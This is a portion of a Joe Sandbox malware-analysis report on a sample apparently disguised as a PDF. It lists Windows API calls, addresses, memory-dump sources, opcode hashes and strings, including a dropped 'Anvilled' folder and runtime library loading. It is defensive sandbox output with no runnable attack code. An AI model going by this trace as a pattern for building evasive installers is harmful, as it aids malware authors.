                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                • Opcode ID: 2636aa4b6e8d56909014eda2f457a88b1db290e94deca41eabb4e2e5bf5542ae
                                                                                                                                                • Instruction ID: 6944e5d097c49adef6872dbe64bc52011f165bd8882031d975811287a59293c5
                                                                                                                                                • Opcode Fuzzy Hash: 2636aa4b6e8d56909014eda2f457a88b1db290e94deca41eabb4e2e5bf5542ae
                                                                                                                                                • Instruction Fuzzy Hash: C1D09E71118201AEDF054F20DE4AF1FBA65EF84711F114A2CF2A5940F0DA718825AB15
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402B11
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                • Opcode ID: c9684272530c97a3937d2c2dd0a9e88e4371c21dc146d787c3a44186b09c15e4
                                                                                                                                                • Instruction ID: bb3698166f2f7887da60b512e7e280e5d3ba2552d442c0d01900f7df534159fe
                                                                                                                                                • Opcode Fuzzy Hash: c9684272530c97a3937d2c2dd0a9e88e4371c21dc146d787c3a44186b09c15e4
                                                                                                                                                • Instruction Fuzzy Hash: CBE0DF722452007FD600AB11ED8AC3FB31CEB8031EF04483FF504A40C1C67E280186AA
                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000,004149F0,-0032BFAE,?,00000000,0040312E,?,?,00403292,004149F0,-0032BFAE), ref: 00406A74
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                                                                                • Instruction ID: 385196eb23d11a36dc6e38e8ab68dc4ec2e70565b983062d54c52da8055020ce
                                                                                                                                                • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                                                                                • Instruction Fuzzy Hash: B0E0BF7220011ABB8F205B8ADD04D9FBFADEE966A07114026B905A6150D670EA11DAE4
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,0041B41F,-0032BFAE,?,00000000,0040322C,004189F0,0041B41F,004149F0,-0032BFAE,?,004032F7), ref: 00406B37
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: 918db18773234dd27a4ccea7b05120dde1c36639e2429e3c910a208a0e7f3d6c
                                                                                                                                                • Instruction ID: 1f3280817f598c96c51f842603ae3c0d9e7838c34cd32eb3dba11bf4455027e8
                                                                                                                                                • Opcode Fuzzy Hash: 918db18773234dd27a4ccea7b05120dde1c36639e2429e3c910a208a0e7f3d6c
                                                                                                                                                • Instruction Fuzzy Hash: 57E0B6B2200129BB8F209B8ADD08D9FFFBDEE957A07124036F905E6150D674EA11D6E4
                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004063E3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                • Opcode ID: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                                                                                                                                • Instruction ID: 20d2b18cbbbfb2fbef22a2957ce1d045c06c2643f5e2d934d02d27322de197f6
                                                                                                                                                • Opcode Fuzzy Hash: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                                                                                                                                • Instruction Fuzzy Hash: 75E0B6B2010209BEEF095F90ED0AEBB361DEB08310F01852EBE06E4091E6B5ED30A675
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNELBASE(7031501C,?,?,70315034), ref: 70311A68
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: 7ffadcbdbd200e649b60874f5986c648bfabf7abe24a70edac637cffcd16f495
                                                                                                                                                • Instruction ID: 0b4c47e1ee445b832589b69b20262e4c45f4e59257d2d40d53fc65d54a33fd8c
                                                                                                                                                • Opcode Fuzzy Hash: 7ffadcbdbd200e649b60874f5986c648bfabf7abe24a70edac637cffcd16f495
                                                                                                                                                • Instruction Fuzzy Hash: CDF0AC76919B41DEC318CF9EDC847097AE8B71C344B21C52FF649DB360C37085409B9A
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00424230,00000000,00000800,00424230,?,00406ABA,00000800,?,?,?,Call,00000000,00000000), ref: 00406411
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Open
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                                                                                • Instruction ID: c4076ac10ec322d1f621b48464b0146dd55e4c4a2c3eba9e58b2c244d89ab2f2
                                                                                                                                                • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                                                                                • Instruction Fuzzy Hash: 3CD0123200020DBBDF116E909D05FAB372DEB04350F01482AFE06A4091D775D530AB19
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • SetDlgItemTextW.USER32(?,?,00000000), ref: 00405637
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemTextlstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3433768297-0
                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004055FD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,?,?,0040543B), ref: 00405614
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004036CC,?), ref: 0040313F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(?), ref: 70312DD3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404539
                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404545
                                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 0040458D
                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004045A6
                                                                                                                                                • SetWindowLongW.USER32(00000000,?,Function_000059D3), ref: 004045BD
                                                                                                                                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 004045D3
                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004045E5
                                                                                                                                                • SendMessageW.USER32(00000000,00001109,00000002), ref: 004045F8
                                                                                                                                                • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404604
                                                                                                                                                • SendMessageW.USER32(00000000,0000111B,?,00000000), ref: 00404616
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404619
                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404647
                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404651
                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004046FC
                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404726
                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040473C
                                                                                                                                                • GetWindowLongW.USER32(?,?), ref: 0040476B
                                                                                                                                                • SetWindowLongW.USER32(?,?,00000000), ref: 00404778
                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 0040478C
                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 004048C9
                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404944
                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404963
                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,?), ref: 0040498F
                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004049C4
                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004049EB
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004049FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                                                                                                                                • String ID: M
                                                                                                                                                • API String ID: 1688767230-3664761504
                                                                                                                                                • Opcode ID: bee424e7aad126ffc3dd94acac0c55c887baa37b8f9f8150c8b02386ace4a1e4
                                                                                                                                                • Instruction ID: f817e89bcf48760cfb5f4289bf731060a572f333ebe8f74edde3a20025983385
                                                                                                                                                • Opcode Fuzzy Hash: bee424e7aad126ffc3dd94acac0c55c887baa37b8f9f8150c8b02386ace4a1e4
                                                                                                                                                • Instruction Fuzzy Hash: 7A12C0B16043009FD720DF25DD45A2BB6E9EBC8314F104A3EFA95E72E1DB789C418B59
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004041D9
                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404203
                                                                                                                                                  • Part of subcall function 00406B4F: GetDlgItemTextW.USER32(?,?,00000400,0040504F), ref: 00406B62
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EC7
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,?,?,00000000), ref: 00406ED6
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EDB
                                                                                                                                                  • Part of subcall function 00406E52: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EF3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Char$Next$ItemText$PrevWindow
                                                                                                                                                • String ID: :B$ :B$ :B$A$C:\Users\user\AppData\Local\Anvilled$Call
                                                                                                                                                • API String ID: 4089110348-2490974419
                                                                                                                                                • Opcode ID: 64a89f78390c37e28e39dbc90de8c98faa8b9fb800003988ad5373c0b078ce64
                                                                                                                                                • Instruction ID: a7973db417e6baa05db810715503a342ede3a04454d7dbc9c1eaaa2829578ea4
                                                                                                                                                • Opcode Fuzzy Hash: 64a89f78390c37e28e39dbc90de8c98faa8b9fb800003988ad5373c0b078ce64
                                                                                                                                                • Instruction Fuzzy Hash: 8C91B2B1604311ABD710AF65DD81B5B76A8EF84704F41083EFB85B62D1DA7CD9018BAE
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 703112F8: GlobalAlloc.KERNEL32(?,?,703111C4,-000000A0), ref: 70311302
                                                                                                                                                • GlobalAlloc.KERNEL32(?,00001CA4), ref: 7031294E
                                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 703129A4
                                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 703129AF
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703129C0
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 70312A44
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 70312A4A
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 70312A50
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 70312B1A
                                                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 70312B2B
                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 70312B82
                                                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 70312B9D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1042148487-0
                                                                                                                                                • Opcode ID: 5bb554575632c6e7a18bf90b177c5a8e65afd372b48f91d547844c50007fb610
                                                                                                                                                • Instruction ID: 9fe025c09ddb13245b9802847389623cdcb51ae6b55474183e32431744e2b8f7
                                                                                                                                                • Opcode Fuzzy Hash: 5bb554575632c6e7a18bf90b177c5a8e65afd372b48f91d547844c50007fb610
                                                                                                                                                • Instruction Fuzzy Hash: 06429171A08B03DFD31DCF25C440A5EB7E9BF8C310F114A2EE59A96294EB70D9E58B91
                                                                                                                                                APIs
                                                                                                                                                • CoCreateInstance.OLE32(004089F0,?,00000001,004089D0,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 004023D8
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Anvilled, xrefs: 0040241F
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll, xrefs: 004024AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
                                                                                                                                                • API String ID: 542301482-3642691353
                                                                                                                                                • Opcode ID: b71783c70e184a6a7ddeb92b2c083ba09767801481a9076baeb437bf216bbb0d
                                                                                                                                                • Instruction ID: f69d0b7262b398630d4842e81ecf7832ddb853ca3a8a3f947773e47297c7f3c3
                                                                                                                                                • Opcode Fuzzy Hash: b71783c70e184a6a7ddeb92b2c083ba09767801481a9076baeb437bf216bbb0d
                                                                                                                                                • Instruction Fuzzy Hash: ED414B72204341AFC314DFA5C948A2BBBE9FF89304F10092EF695DB291DBB9D805CB16
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                • Opcode ID: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                                                                                                                                • Instruction ID: 674c96032337a1ae6b1bd2494ca7cf71499a5ca917b528e2f8746cac593059ec
                                                                                                                                                • Opcode Fuzzy Hash: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                                                                                                                                • Instruction Fuzzy Hash: D9D0E261415250AAD260AF718A49ABA73ADAF05354F204A3EF196E20D1EABC6502932F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                                                                                                                                • Instruction ID: 0f19b20907bbe26c6374d5e5023c6d38e836cc393430afbe8d7ff324f94daeea
                                                                                                                                                • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                                                                                                                                • Instruction Fuzzy Hash: 36C16A71A0C3918FD364CF29C48076ABBE1FBC5300F54892EE4DA97391E678A546DB4B
                                                                                                                                                APIs
                                                                                                                                                • CheckDlgButton.USER32(?,?,00000001), ref: 00403F2C
                                                                                                                                                • EnableWindow.USER32(?), ref: 00403F39
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00403F45
                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403F61
                                                                                                                                                • GetSysColor.USER32(?), ref: 00403F72
                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403F80
                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403F8E
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00403F94
                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403FA1
                                                                                                                                                • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403FB8
                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404014
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040401B
                                                                                                                                                • EnableWindow.USER32(00000000), ref: 00404038
                                                                                                                                                • GetDlgItem.USER32(0000004E,000003E8), ref: 0040405C
                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004040B1
                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004040C3
